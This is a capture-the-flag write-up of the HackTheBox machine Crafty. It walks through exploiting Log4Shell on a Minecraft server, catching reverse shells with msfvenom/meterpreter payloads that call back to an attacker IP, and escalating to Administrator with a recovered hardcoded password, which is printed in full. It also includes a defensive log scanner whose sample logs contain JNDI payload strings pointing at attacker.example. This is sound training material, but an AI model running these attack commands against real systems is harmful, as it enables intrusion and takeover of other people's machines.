Crafty
Crafty writeup by Thamizhiniyan C S
Overview
Greetings everyone,
In this write-up, we will tackle Crafty from HackTheBox.
Machine link: Crafty Machine
Difficulty Level: Easy
Let's Begin 🙌
Firstly, connect to the HTB server using the OpenVPN configuration file generated by HTB. Click Here to learn more about how to connect to VPN and access the boxes.
Once connected to the VPN service, click on "Join Machine" to access the machine's IP.
Upon joining the machine, you will be able to view the IP address of the target machine.
Reconnaissance
Nmap Port Scan
nmap -p- -T4 -Pn <TARGET_IP>

Nmap Intense Scan
nmap -A -p 80,25565 -v -Pn <TARGET_IP>

Results
Port 80: HTTP, Microsoft-IIS httpd 10.0
Port 25565: Minecraft, Minecraft 1.16.5
Information Gathering - crafty.htb
First, let's take a look at the website running on port 80.

When attempting to access port 80, it redirects to the domain crafty.htb. Therefore, to access the website, we need to add an entry to the /etc/hosts file mapping the domain to the target IP address.
Command: sudo vim /etc/hosts

Now we have access to the website. I used Wappalyzer to check the technologies employed, but nothing of particular interest was discovered.

A subdomain, play.crafty.htb, was mentioned on the website. To access it, append another entry to the /etc/hosts file.

However, upon attempting to access it, it redirected back to crafty.htb.

Subdomain Enumeration
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://FUZZ.crafty.htb/

VHOST Enumeration

So it seems that nothing noteworthy was discovered on the website either.
Information Gathering - Port 25565
CVE-2021-44228
Next, I began the process of enumerating the Minecraft server running on port 25565. I conducted a Google search to identify potential vulnerabilities and exploits specifically targeting Minecraft server version 1.16.5. Here's what I found:
CVE-2021-44228 is a security vulnerability in the Apache Log4j library, a widely used logging framework in Java applications. This vulnerability, also known as Log4Shell, allows attackers to execute malicious code remotely by exploiting a flaw in the library's JNDI (Java Naming and Directory Interface) lookup mechanism.
Based on the information provided in the article, it appears evident that the Minecraft Server running on the target is vulnerable to CVE-2021-44228, as it utilizes the Log4j library.
Next, I proceeded to search for exploits and proofs of concept (PoCs) for this vulnerability and came across the following:
Initial Access
Understanding the Attack
The script provided in the repository sets up an HTTP server and an LDAP server for you. Additionally, it generates a payload that you can insert into the Minecraft game or client.
When you paste the crafted payload into the Minecraft client, it connects back to the HTTP server hosted by the script. This server then references the exploit hosted by the LDAP server within the script. Upon successful execution of the exploit, a reverse shell is established, connecting back to a listener on your attacker machine. This process allows you to gain control over the target system.
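The chain above works because the chat message ends up in the server's Log4j output, where the lookup is evaluated. From the defender's side, the same fact makes the attack visible: the lookup string is written to the server log verbatim. The following scanner is an added example written for this writeup (not part of the original post or of the PoC repository); it parses constructed Minecraft-style chat log lines and reports every JNDI lookup, the player who sent it and the scheme used, with the hostname attacker.example standing in for whatever host the lookup points at.

```python
import re

# Constructed sample log excerpt (not captured from the box): vanilla/Paper-style
# Minecraft server log lines, two of which carry a JNDI lookup in chat.
SAMPLE_LOG = """\
[12:00:01] [Server thread/INFO]: alice joined the game
[12:00:05] [Server thread/INFO]: <alice> hello everyone
[12:00:09] [Server thread/INFO]: <bob> ${jndi:ldap://attacker.example:1389/a}
[12:00:12] [Server thread/INFO]: <carol> ${JNDI:rmi://attacker.example:1099/b}
[12:00:15] [Server thread/INFO]: bob left the game
"""

# Chat lines have the shape "[HH:MM:SS] [Server thread/INFO]: <player> message".
CHAT_LINE = re.compile(
    r"^\[(?P<time>\d{2}:\d{2}:\d{2})\] \[Server thread/INFO\]: "
    r"<(?P<player>[^>]+)> (?P<message>.*)$"
)
# Log4j lookup syntax "${jndi:<scheme>:...}", matched case-insensitively so that
# capitalisation variants of the prefix are not missed.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z0-9+.-]+)\s*:", re.IGNORECASE)


def parse_chat_line(line):
    """Return (time, player, message) for a chat line, else None."""
    m = CHAT_LINE.match(line.rstrip("\n"))
    if not m:
        return None
    return m.group("time"), m.group("player"), m.group("message")


def find_jndi_lookups(message):
    """Return the lower-cased JNDI schemes (ldap, rmi, dns, ...) found in a message."""
    return [m.group("scheme").lower() for m in JNDI_LOOKUP.finditer(message)]


def scan_log(text):
    """Return one finding per JNDI lookup seen in chat, in log order."""
    findings = []
    for line in text.splitlines():
        parsed = parse_chat_line(line)
        if parsed is None:
            continue  # join/leave and other non-chat lines are ignored
        time, player, message = parsed
        for scheme in find_jndi_lookups(message):
            findings.append({"time": time, "player": player, "scheme": scheme, "message": message})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} player={f['player']} scheme={f['scheme']} msg={f['message']!r}")
```

Detection only tells you what was already logged; Mojang's published fix for 1.12 to 1.16.5 servers was a replacement Log4j configuration file (log4j2_112-116.xml) that disables message lookups.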
Setting up the Environment
I cloned the above mentioned repository using Git.

To set up the environment for the exploit to run, I first created a virtual environment using Python. Then, I installed the necessary dependencies mentioned in the requirements.txt file.
python3 -m venv venv
source ./venv/bin/activate

Next, it's time to install the dependencies.

To obtain the Java SDK version the repository requires, follow the instructions in its README file: Getting the Java Version.
Extract the downloaded file.

Check whether you have installed the SDK correctly by verifying its version.

Now, rename the sdk folder as mentioned in the repository.

While examining the poc.py file to determine the required arguments for running the exploit, I noticed a variable named cmd with the value "/bin/bash" specified on line 26. It appears that the exploit was designed for a Linux target. However, since our target is a Windows machine (running Microsoft IIS server), we should modify the value to "cmd.exe" in order to obtain the shell.

We have successfully set up the environment for the exploit to run.
Setting up PyCraft
We require either the Minecraft game itself or a Minecraft client to connect to the Minecraft server running on the target. For this purpose, I've decided to utilize PyCraft, a Minecraft Python Client Library.
First clone the repository.

Next install the dependencies.

We have successfully set up PyCraft.
Setting up a Netcat Listener
Since the exploit establishes a reverse shell back to our host, we need to set up a netcat listener on our attacking machine to receive the reverse shell. We will configure the netcat listener to listen on port 9001.

Performing the Attack
First let's start the HTTP and LDAP server.
python3 poc.py --userip <HTB_TUN_IP/Attacker_IP> --webport 25565 --lport 9001

The highlighted text depicted in the image above represents the crafted payload.
Next, connect to the Minecraft server using PyCraft. Enter a random username, leave the password field empty, and input the IP address of the target machine in the Server host field. Then, paste the payload and press enter once connected to the server.

Now, check the HTTP server hosted by the poc.py script. You'll notice that we have received a request from the Minecraft server, and the script has served the exploit accordingly.

Now, check the netcat listener. You'll observe that the reverse shell has successfully connected to the listener, and you can see the command prompt from the target machine. This indicates that we have successfully executed the attack and gained access to the target machine.

Getting the User Flag
I found the user.txt file in the C:\Users\svc_minecraft\Desktop directory.

Privilege Escalation
Finding the First Loop Hole
As I was navigating through the directories on the target machine, I found that there was nothing noteworthy in the logs folder and other files. However, I came across a suspicious file named playercounter-1.0-SNAPSHOT.jar in the C:\Users\svc_minecraft\plugins\ directory.
To examine that file, we need to download it to our attacker machine. Initially, I attempted to start an HTTP server from the target machine, but the firewall blocked it, and we don't have the necessary permissions to override it. Therefore, I opted to use Meterpreter to download the file instead.
Generating the First Meterpreter Reverse Shell using msfvenom
To create a Meterpreter reverse shell using msfvenom, we first need to select a payload. To do this, we must determine the target machine's architecture. We can retrieve the processor architecture by executing the command "echo %PROCESSOR_ARCHITECTURE%" in the command prompt.

Now that we know the target machine's architecture is x64, it's time to generate the reverse shell using msfvenom.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<HTB_TUN_IP/Attacker_IP> LPORT=4444 -f exe >> rev.exe

We have successfully created the reverse shell.
Setting up msfconsole
To set up a listener for the reverse shell to connect back, open msfconsole and enter the following commands:
use exploit/multi/handler
set lhost <HTB_TUN_IP/Attacker_IP>
set payload windows/x64/meterpreter/reverse_tcp

Now it's time to start the listener.

Sending the First Reverse Shell to Target
Let's start a simple Python HTTP server to transfer the reverse shell from our attacker machine to the target machine.

While in the shell of the target machine, switch to PowerShell using the command "powershell", then type the following command to download the reverse shell.

You can see that we have successfully transferred the reverse shell to the target machine.

Executing the Reverse Shell
Now it's time to execute the reverse shell.

Check the listener in msfconsole. You can see the meterpreter session.

Now switch to the plugins directory.

Use the download command to download the jar file from the target machine.
download C:\\users\\svc_minecraft\\server\\plugins\\playercounter-1.0-SNAPSHOT.jar

Now we have successfully downloaded the file to our attacker machine.
Finding the Second Loop Hole
To view the contents of the JAR file, we require a Java decompiler. Jadx-GUI is one of the recommended decompilers available.
Clone the mentioned repository.

Now build the JADX-GUI tool.

After the build process is complete, navigate to the build/jadx/bin directory and run the JADX-GUI application.

Now open the jar file.

After inspecting the contents and code of the JAR file, I came across a string that appears to resemble a password.

The password we found might be the Administrator's password.
Finding a Way to Break Through
Since we've obtained the Administrator's password (albeit through a guess), we can attempt to escalate our privileges using common Windows privilege escalation techniques. One such method involves utilizing the built-in runas command in Windows, which is somewhat equivalent to the sudo command in Linux, allowing us to run processes with elevated privileges.
To know more:
In this scenario, I will utilize the RunasCs tool, an improved version of the default Windows runas.exe program.
You can download the latest version of RunasCs from here: https://github.com/antonioCoco/RunasCs/releases
Our objective is to leverage the RunasCs tool to execute a reverse shell as Administrator, utilizing the password we discovered.
Generating the Second Reverse Shell
We can employ the same reverse shell that we've previously uploaded to the target machine. However, I've created a new reverse shell on a different port to ensure that the previous session remains undisturbed for backup.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<HTB_TUN_IP/Attacker_IP> LPORT=4445 -f exe >> rev2.exe

Setting up the Second Listener
Now, set up the second listener in another terminal within msfconsole.

Uploading the RunasCs.exe and the Second Reverse Shell
Now, it's time to upload the RunasCs.exe and the second reverse shell to the target machine using the previously obtained Meterpreter shell.

Executing the Second Reverse Shell with Elevated Privileges
Type the command "shell" to open the command prompt from the Meterpreter session, then execute the RunasCs.exe application to run the reverse shell with elevated privileges.
.\RunasCs.exe Administrator s67u84zKq8IXw rev2.exe

Now, check the second Meterpreter session for the reverse shell with elevated privileges.

Getting the Root Flag
You can get the root flag in the C:\Users\Administrator\Desktop directory.

We have successfully obtained the user and root flags.
Thank You.....